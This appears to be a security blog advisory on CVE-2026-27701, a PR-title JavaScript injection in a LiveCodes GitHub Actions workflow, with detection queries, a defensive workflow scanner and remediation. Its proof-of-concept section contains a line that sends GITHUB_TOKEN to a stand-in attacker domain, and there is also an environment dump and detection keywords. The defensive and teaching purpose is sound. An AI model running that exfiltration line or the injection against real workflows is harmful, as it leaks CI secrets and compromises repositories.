Critical CI Breach Exposed: CVE-2026-27701 Allows PR Title to Hijack GitHub Actions and Leak Secrets in LiveCode

LiveCode – CI Secret Exfiltration via GitHub Actions JavaScript Injection (PR Title)

CVE ID: CVE-2026-27701
Product: LiveCode (livecodes repository – GitHub Actions workflow i18n-update-pull)
CVSS Score: 8.8 (High)
Severity: High
Attack Vector: Remote (via Pull Request submission)
Attack Complexity: Low
Privileges Required: None (attacker only needs ability to open a PR)
User Interaction: Required (workflow triggered by PR event)
Scope: Changed (code execution within CI context)
Impact: Confidentiality – High | Integrity – High | Availability – Low
Exploitability: Practical wherever a workflow interpolates untrusted PR metadata into a script or shell body
Public Exploit Availability: No confirmed public weaponized exploit repository at time of writing; vulnerability is reproducible for research and defensive validation


Overview

A code injection vulnerability was identified in a GitHub Actions workflow used by the LiveCode project. The affected workflow (i18n-update-pull) used actions/github-script and embedded the pull request title directly in the script body through a GitHub Actions expression (${{ ... }}). The expression reads github.event.issue.title, the field carried by the issues and issue_comment event payloads; for a comment on a pull request the event's issue object is the pull request itself, so the field holds the PR title.

Actions expands expressions textually when the step is prepared, before any JavaScript runs, so whatever the title contains becomes part of the script source that Node.js then executes. No sanitization or escaping was applied, so an attacker-controlled title could inject arbitrary JavaScript that runs on the runner with the permissions of the workflow's token.

This is effectively remote code execution inside CI, with the potential to exfiltrate any secret exposed to the step or to abuse the GitHub API permissions granted to the workflow token.


Technical Root Cause

The vulnerability originated from unsafe interpolation of user-controlled data into executable JavaScript.

Example of the vulnerable pattern:

- uses: actions/github-script@v7
  with:
    script: |
      const prTitle = `i18n: ${{ github.event.issue.title }}`;

Key issue:

  • ${{ github.event.issue.title }} is expanded by the Actions expression engine when the step is prepared, before the script runs.
  • The expanded value is pasted into the script text, so it becomes JavaScript source rather than a string value.
  • A title containing a backtick closes the template literal and lets arbitrary statements follow; a title containing a JavaScript template expression (${...}) is evaluated inside the literal without closing it at all; quotes and semicolons play the same role in other string contexts.
  • No escaping or encoding was performed, and none would be reliable: the fix is to keep the value out of the source text entirely.

actions/github-script runs the script in Node.js on the runner, where it has access to:

  • The workflow token: github-script receives it as its github-token input (by default ${{ github.token }}) and exposes a pre-authenticated Octokit client as `github`; the token is not in process.env unless the workflow exports it there
  • The step's environment variables, including any secrets mapped in with env:
  • Repository APIs through that client
  • Outbound network connectivity

Injected code could therefore:

  • Call GitHub REST APIs
  • Modify issues or PRs
  • Push commits
  • Read repository contents
  • Send data externally via HTTPS

Attack Scenario

Step-by-step exploitation flow:

  1. Attacker forks the repository.
  2. Attacker opens a pull request (or edits the title of an existing one).
  3. The malicious payload is the PR title itself.
  4. The workflow is triggered by the corresponding event.
  5. The Actions expression engine expands the PR title into the script source.
  6. Node.js executes the resulting script inside the CI runner.
  7. Attacker-controlled logic runs with the workflow token's permissions.

Which permissions those are depends on the trigger: a workflow run by pull_request from a fork receives a read-only GITHUB_TOKEN and no repository secrets, whereas workflows triggered by issues, issue_comment or pull_request_target run in the base repository's context with the default token permissions and full access to secrets. Title-driven automation such as this typically falls in the second group, which is what turns this class of bug into a secret-exfiltration issue rather than a contained one.

Proof of Concept (Educational)

The vulnerability relies on breaking out of the JavaScript string context.

A malicious PR title could conceptually:

  • Close the existing string
  • Inject arbitrary JavaScript
  • Resume syntax to avoid detection

Example of how injection logic works conceptually:

<closing backtick or quote>
<malicious JavaScript>
<comment or syntax balancing>

Potential impact demonstration (lab use only):

  • Reading environment variables: console.log(process.env);
  • Making an outbound network request: require("https").get("https://attacker-domain.com?data=" + process.env.GITHUB_TOKEN);

Note that GITHUB_TOKEN appears in process.env only if the workflow maps it there; in a github-script step the token is always reachable through the `github` client and the action's github-token input, and any secret the step receives via env: is in process.env regardless.

No public fully automated exploit kit has been confirmed, but replication in a test repository is straightforward for defensive validation.

Testing must only be performed in isolated environments with disposable tokens.


Impact Assessment

Confidentiality Impact

  • Exposure of CI environment variables
  • Potential leakage of GitHub tokens
  • Possible access to private repository contents

Integrity Impact

  • Unauthorized issue or PR manipulation
  • Repository content modification (if permissions allow)
  • Malicious commits under bot identity

Availability Impact

  • Limited, unless malicious code intentionally disrupts workflow runs

MITRE ATT&CK Mapping

  • T1059.007 – Command and Scripting Interpreter: JavaScript
  • T1567 – Exfiltration Over Web Service
  • T1552 – Unsecured Credentials
  • T1195 – Supply Chain Compromise (if abused in CI/CD pipeline)

Detection and Threat Hunting

Log Sources

  • GitHub Audit Logs
  • GitHub Actions Workflow Logs
  • Runner Network Logs (egress monitoring)
  • Proxy/Firewall Logs
  • SIEM Ingested GitHub Events API
  • Cloud provider logs (if self-hosted runners)

Detection Rules and Queries

1. Repository Static Analysis Detection

Search for unsafe interpolation patterns:

git grep -nE '\$\{\{ *github\.event\.(issue|pull_request)\.(title|body)' .github/workflows/
git grep -nE '\$\{\{ *github\.(head_ref|event\.(comment|review)\.body|event\.head_commit\.message)' .github/workflows/
git grep -n 'actions/github-script' .github/workflows/

Review every script: or run: body that contains a ${{ github.event.* }} expression referencing attacker-controlled fields (title, body, comment, branch name, commit message). The same expression in an env: or with: entry is passed as data rather than spliced into code, which is the safe position, provided the receiving script does not itself evaluate it.
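As an added example (not part of the LiveCodes repository or its tooling), the grep above generalised into a small scanner that tells a ${{ }} expression in a run: or script: body (code position) apart from the same expression in env: (data position). The sample workflow and the list of untrusted context paths are constructed for this example, and the list is deliberately a subset of the contexts GitHub documents as attacker-controlled.

```javascript
// Added example (not LiveCodes tooling): indentation-aware scan of workflow YAML
// for `${{ }}` expressions over attacker-controlled context inside run:/script:
// bodies. The context list below is a constructed subset, not an exhaustive one.

// Context paths an external contributor controls (subset).
const UNTRUSTED_CONTEXTS = [
  /github\.event\.issue\.(title|body)/,
  /github\.event\.pull_request\.(title|body)/,
  /github\.event\.pull_request\.head\.(ref|label)/,
  /github\.event\.(comment|review|review_comment)\.body/,
  /github\.event\.(head_commit|commits\[\d*\])\.message/,
  /github\.head_ref/,
];

// Returns [{ line, key, expression }] for every untrusted expression found in a
// `run:` or `script:` value, whether inline or in a `|` / `>` block scalar.
// Expressions under `env:` or other keys are data, not code, and are not reported.
function findUnsafeInterpolations(yamlText) {
  const findings = [];
  let block = null; // { key, indent } while inside a run:/script: block scalar
  yamlText.split("\n").forEach((line, index) => {
    const indent = line.match(/^ */)[0].length;
    // A non-blank line at or below the key's indentation ends the block scalar.
    if (block && line.trim() !== "" && indent <= block.indent) block = null;
    const keyMatch = line.match(/^( *)(?:- +)?(run|script): *(.*)$/);
    let inlineKey = null;
    if (keyMatch) {
      if (/^[|>]/.test(keyMatch[3])) block = { key: keyMatch[2], indent: keyMatch[1].length };
      else inlineKey = keyMatch[2];
    }
    const codeKey = block ? block.key : inlineKey;
    if (!codeKey) return;
    for (const expr of line.matchAll(/\$\{\{([^}]*)\}\}/g)) {
      const body = expr[1].trim();
      if (UNTRUSTED_CONTEXTS.some((re) => re.test(body))) {
        findings.push({ line: index + 1, key: codeKey, expression: body });
      }
    }
  });
  return findings;
}

// Constructed sample: one injection in a github-script body, one in an inline
// run:, one safe env: mapping, and one trusted context in a run:.
const SAMPLE_WORKFLOW = [
  "name: i18n-update-pull",
  "on:",
  "  issue_comment:",
  "    types: [created]",
  "jobs:",
  "  update:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/github-script@v7",
  "        with:",
  "          script: |",
  "            const prTitle = `i18n: ${{ github.event.issue.title }}`;",
  "            console.log(prTitle);",
  '      - run: echo "${{ github.event.comment.body }}"',
  "      - name: safe",
  "        env:",
  "          PR_TITLE: ${{ github.event.issue.title }}",
  "        run: |",
  '          echo "$PR_TITLE"',
  '      - run: echo "${{ github.repository }}"',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  // Usage: node scan-workflows.js .github/workflows/*.yml  (no args: scans the sample)
  const fs = require("node:fs");
  const files = process.argv.slice(2);
  const inputs = files.length
    ? files.map((f) => [f, fs.readFileSync(f, "utf8")])
    : [["<sample>", SAMPLE_WORKFLOW]];
  for (const [name, text] of inputs) {
    for (const f of findUnsafeInterpolations(text)) {
      console.log(`${name}:${f.line}: ${f.key}: ${f.expression}`);
    }
  }
}
```

On the sample this reports line 12 (script, github.event.issue.title) and line 14 (run, github.event.comment.body) and stays silent on the env: mapping at line 17 and the trusted github.repository at line 20. It is a line-based heuristic, not a YAML parser: it will miss flow-style mappings and expressions split across lines, so treat a clean result as a prompt for manual review rather than a clearance.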


2. GitHub Audit Log Detection

Query Logic (Generic API-based Query)

Look for unusual API calls from workflow bot account:

actor:github-actions[bot]
AND action IN (repo.create, repo.push, secret.access, issue.edit, pr.edit)
AND created_at within 5 minutes of pull_request event

3. Suspicious Outbound Traffic from Runner

If self-hosted runners are used:

source_ip:runner_ip_range
AND http_method:POST
AND destination_domain NOT IN (approved_domains_list)
AND timestamp within workflow_execution_window

4. Workflow Behavior Correlation

Detect PR-triggered workflow performing write operations:

event_name:pull_request
AND workflow_name:"i18n-update-pull"
AND github_token_permission:write

5. Unusual Environment Variable Access

Search workflow logs for:

process.env
console.log(process.env)
require("https")
require("http")
child_process

Indicators of Compromise

  • Unexpected outbound HTTPS calls during workflow execution
  • CI bot performing unusual repository modifications
  • PR-triggered workflows modifying branches
  • Base64-encoded strings in workflow logs
  • Unexpected JavaScript syntax errors during workflow runs

Remediation

Immediate Actions

  • Apply the official patch to the affected workflow.
  • Rotate any long-lived secrets the workflow could reach (personal access tokens, deploy keys, cloud or registry credentials); the per-run GITHUB_TOKEN expires when its job finishes and cannot be rotated, but anything it did must be reviewed.
  • Review audit logs for suspicious activity by the github-actions bot during the exposure window.
  • Restrict workflow token permissions to the minimum the workflow needs.

Secure Coding Practices for GitHub Actions

  • Never inline untrusted data into executable JavaScript or shell; an Actions expression inside script: or run: is source code, not a value.
  • Pass user data to the step as an environment variable and read it from process.env (or "$VAR" in shell), where it is data and cannot change the program.
  • Declare a minimal permissions: block in the workflow YAML so the token cannot do more than the job requires.
  • Avoid granting write permissions to workflows that run on events outside contributors can trigger.
  • Separate trusted and untrusted workflow triggers, and treat issues, issue_comment and pull_request_target as untrusted input running with trusted permissions.

Example secure pattern, with the title mapped through env: and read inside the script as plain data:

- uses: actions/github-script@v7
  env:
    PR_TITLE: ${{ github.event.issue.title }}
  with:
    script: |
      const prTitle = process.env.PR_TITLE;

The script must then keep treating prTitle as data: never feed it to eval or new Function, and never interpolate it unquoted into a shell command.

Hardening Recommendations

  • Use least privilege for GITHUB_TOKEN
  • Disable workflow writes for forked PRs
  • Enable branch protection rules
  • Require maintainer approval for workflow runs
  • Use separate workflows for write operations
  • Implement outbound network monitoring for runners

Official Patch

The vulnerability has been fixed by modifying the workflow to avoid unsafe JavaScript interpolation.

Official patch commit:

https://github.com/live-codes/livecodes/commit/e151c64c2bd80d2d53ac1333f1df9429fe6a1a11

Organizations using similar workflow patterns are advised to review and patch immediately.


Final Assessment

This vulnerability highlights a common CI/CD security anti-pattern: treating user-controlled metadata as executable code. While the exploit requires only a Pull Request submission, the impact can extend to full repository compromise depending on workflow permissions.

The risk is particularly significant for open-source projects that automatically run workflows on external contributions.

Strict separation between untrusted input and executable script logic must be enforced across all CI pipelines.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.